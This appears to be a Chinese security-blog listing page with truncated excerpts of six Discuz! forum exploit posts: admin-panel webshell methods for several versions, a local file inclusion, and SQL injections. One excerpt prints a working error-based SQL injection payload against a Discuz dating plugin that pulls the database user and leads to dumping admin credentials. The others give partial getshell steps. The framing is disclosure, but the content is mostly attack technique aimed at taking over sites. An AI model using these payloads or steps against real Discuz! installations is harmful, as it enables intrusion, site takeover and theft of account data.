• Discuz! X3.1后台拿shell

    Discuz! X3.1后台拿shell
    漏洞作者:江南的鱼 之前写的几个后台拿shell,Discuz!忽略了,但新版本Discuz! X3.1 Release 20140301实际上有所加强,但是真的修复了之前提到的问题吗? Discuz!大概做了下面几个改动: 1.统计代码处,对 阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:25,275次 | 标签:
  • Discuz UC_Server 本地文件包含漏洞

    Discuz UC_Server 本地文件包含漏洞
    看到有位朋友提交到了乌云,那我就把这个包含放出来吧。 http://www.wooyun.org/bugs/wooyun-2014-062388 ########################################## # Title : Discuz UC_Server 本地文件包含漏洞 # Time :2014年5月30日 # Team :08 Security Team # Author :08安全团队 # 首发 :08安全团队 ####################################### 漏洞利用步骤: 前台上传一个图...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:12,948次 | 标签:
  • Discuz!7.X后台任意代码执行

    Discuz!7.X后台任意代码执行
    由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行 首先到全局附件设置修改上传目录 然后直接拿他本身存在的计划任务件 /include/crons/announcements_daily.inc.php修改内容为 <?php /* [Discuz!] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: announcements_daily.inc.php 1...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:4,560次 | 标签:,
  • dz3.0/2.5 后台拿shell[Discuz 后台拿shell]

    dz3.0/2.5 后台拿shell[Discuz 后台拿shell]
    上班后看到wooyun社区发布了一个discuz  x3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。 好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!! 经过研究发现,步骤错了。。。。 原帖地址内容: http://zone.wooyun.org/content/3894 用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:21,796次 | 标签:
  • Discuz鸡肋通杀注入漏洞

    Discuz鸡肋通杀注入漏洞
    首先说明这个东西价值不大,测试通杀2.x-3.x,以下的版本没看,具体的利用方法本人也没去研究,顶多mysql有file权限的时候可以getshell,当然discuz还是有不少地方有问题的,这个不能说。。。 作者:Seay 博客:http://www.cnseay.com/ 团队:SafeKey Team http://www.safekeyer.com/ 问题出在文件uc_clientmodelbase.php 的function note_exists函数 function note_exists() { $noteexi...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:10,949次 | 标签:
  • Discuz交友插件漏洞附EXP

    Discuz交友插件漏洞附EXP
    DZ交友插件漏洞jiaoyou.php?pid=1 有的注入需要登录,注入代码如下: ' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1 爆管理账号密码方法一: ' or @`'` and(select 1 from(select...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:6,387次 | 标签: